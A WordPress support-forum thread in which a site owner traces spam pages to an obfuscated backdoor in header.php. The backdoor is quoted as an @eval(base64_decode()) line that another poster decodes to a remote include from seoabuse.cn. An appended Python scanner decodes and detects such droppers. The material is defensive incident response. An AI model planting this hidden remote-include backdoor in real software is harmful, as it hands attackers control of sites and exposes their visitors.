No code found in permalinks from possible worm attack (6 posts)

  1. robadawb
    Member
    Posted 1 month ago #

    We have a wordpress site here at work that was recently reported to us by our IT security department as serving out spam pages. This does not appear to be the case anymore; however, searching google's cache shows us that at some point in the past it was doing just that.

    http://74.125.155.132/search?q=cache:FOPYBfZppvAJ:sciencepolicy.colorado.edu/prometheus/%3Fpilled%3D20100+site:sciencepolicy.colorado.edu+amoxicillin&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a

    This led us to find that there had been a recent attack on older versions of wordpress. I quickly updated the site to the latest version and began to read up on how to clean out the database.

    I did find a mysterious administrator account that is not listed under the users page. However, I did not find anything wrong with our permalinks or RSS feeds. The link below is what was reported as originally serving out the spam pages. It no longer serves out spam, and you will now just get the home page if you open it.

    http://sciencepolicy.colorado.edu/prometheus/?pilled=20100

    Is this the same worm? Or a completely different problem? I'm not very knowledgeable about these sorts of attacks, and I plan on exporting all the wordpress content and then reinstalling the site from scratch to clean out any hacks within the database. But I would like to have a better understanding of what has actually happened.

    Sorry if this is another post regarding this worm. I just felt that this situation might be different, since I did not find the usual strange additions within the permalinks or RSS feeds as was reported by most of the sites I visited regarding this attack.

    Any feedback or insight you can provide is appreciated.

  2. whooami
    Member
    Posted 1 month ago #

    Hi,

    re: http://sciencepolicy.colorado.edu/prometheus/?pilled=20100

    I didn't check to see if this is the case, so maybe you know -- is the resulting front page sending something other than a 200?

    What does a "404 not found" look like?

    Like this:

    http://sciencepolicy.colorado.edu/prometheus/?cherie=2000

    ??

    You see where I'm going? You can craft almost any query you want - it's what happens after that you need to focus on.

    --

    http://www.google.com/#hl=en&q=prometheus%2F%3Fpilled%3D20100&aq=f&aqi=&oq=&fp=2755c6b3e9b2e9

    Lastly, I see the cached page there, and just wanted to make sure that you've checked to see what googlebot sees on that live page, right? The quickest way to do that is to change your UA in Firefox. (I just checked, it looks fine as Googlebot.)

    That's quite an exploit. They actually created a complete post, sidebar, etc., even comments. Wow.

  3. robadawb
    Member
    Posted 1 month ago #

    Right, the spam is no longer being displayed. Not sure why it stopped. We didn't make any changes to the site and it stopped before we even upgraded the site to 2.8.4.

    Interestingly, we found the following piece of code at the top of the header.php file, and promptly removed it.

    <?php
    @eval(base64_decode('QGluY2x1ZGUoJ2h0dHA6Ly9zZW9hYnVzZS5jbi9pbmNsdWRlL3Byb21ldGhldXMvaW5kZXgudHh0Jyk7'));
    ?>

  4. whooami
    Member
    Posted 1 month ago #

    ... which is :
    @include('http://seoabuse.cn/include/prometheus/index.txt');

    If it stopped before you located that bit in the header, it may be because that site went down. It's down now, at least.

    That assumes also, that that was the only file that was altered or added to the web space.

    Check the permissions on all of your files and directories, definitely.

  5. robadawb
    Member
    Posted 1 month ago #

    Yep, and that's what worries me. But permissions have been changed :)

    How did you decode the string? I did not get the same result when I ran the statement with php. Although, I'm not entirely sure I understand the code to begin with.

    Thanks for your help!

  6. robadawb
    Member
    Posted 1 month ago #

    Never mind, I managed to figure that out.
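The decode step discussed in posts 3 to 5, as an added example that is not code from the thread, from WordPress, or from the posters. It decodes the base64 literal rather than running it (passing the statement to php as-is would perform the remote include instead of showing it), unwraps nested eval(base64_decode()) layers, flags any remote include in the final payload, and walks a web root for other files carrying the same wrapper. The sample header is the snippet quoted in post 3; the nested second sample in the usage is constructed here, and the `.phtml`/`.inc` suffixes and the hostname `example.invalid` are assumptions for illustration.

```python
"""Locate eval(base64_decode(...)) droppers in PHP source and decode what they hide.

Added example for this thread, not code from WordPress or from the posters.
Decodes the payload instead of executing it: running the statement through
php would perform the remote include rather than display it.
"""
import base64
import os
import re

# Obfuscation wrapper seen in the thread: optional '@' error suppression,
# eval() around base64_decode() of a quoted literal.
EVAL_B64_RE = re.compile(
    r"""@?\s*eval\s*\(\s*@?\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)

# Remote file inclusion inside a decoded payload (only works when the
# server allows URL includes; either way it is the indicator to report).
REMOTE_INCLUDE_RE = re.compile(
    r"""(?:include|include_once|require|require_once)\s*\(?\s*['"](https?|ftp)://([^'"]+)['"]""",
    re.IGNORECASE,
)

# Constructed sample: the header.php prefix quoted in post 3 of the thread.
SAMPLE_HEADER = (
    "<?php\n"
    "@eval(base64_decode('QGluY2x1ZGUoJ2h0dHA6Ly9zZW9hYnVzZS5jbi9pbmNsdWRlL3Byb21ldGhldXMvaW5kZXgudHh0Jyk7'));\n"
    "?>\n"
    "<!DOCTYPE html>\n"
)


def decode_payload(b64: str) -> str:
    """Decode a base64 literal, tolerating embedded whitespace and missing '=' padding."""
    cleaned = re.sub(r"\s+", "", b64)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned).decode("utf-8", errors="replace")


def unwrap_layers(source: str):
    """Return the decoded layers, innermost last; droppers sometimes nest several."""
    layers = []
    current = source
    while True:
        m = EVAL_B64_RE.search(current)
        if m is None:
            return layers
        current = decode_payload(m.group(2))
        layers.append(current)


def find_backdoors(source: str):
    """Return one record per eval(base64_decode()) wrapper found in source."""
    hits = []
    for m in EVAL_B64_RE.finditer(source):
        layers = unwrap_layers(m.group(0))
        final = layers[-1]
        urls = [f"{scheme}://{rest}" for scheme, rest in REMOTE_INCLUDE_RE.findall(final)]
        hits.append({
            "encoded": m.group(2),
            "decoded": final,
            "layers": len(layers),
            "remote_urls": urls,
        })
    return hits


def scan_tree(root: str):
    """Walk a web root and map each PHP file carrying the wrapper to its findings.

    Suffix list is an assumption; extend it to whatever the server executes as PHP.
    """
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = find_backdoors(fh.read())
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    for hit in find_backdoors(SAMPLE_HEADER):
        print("decoded :", hit["decoded"])
        print("remote  :", hit["remote_urls"])
```

Run it against a copy of the web root (`scan_tree("/path/to/wordpress")`) rather than only header.php: the same wrapper is routinely dropped into wp-config.php, theme footers and plugin files, and a hit in one file says nothing about the others. The decoded text for the header in the thread is `@include('http://seoabuse.cn/include/prometheus/index.txt');`, which is exactly what post 4 reports.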
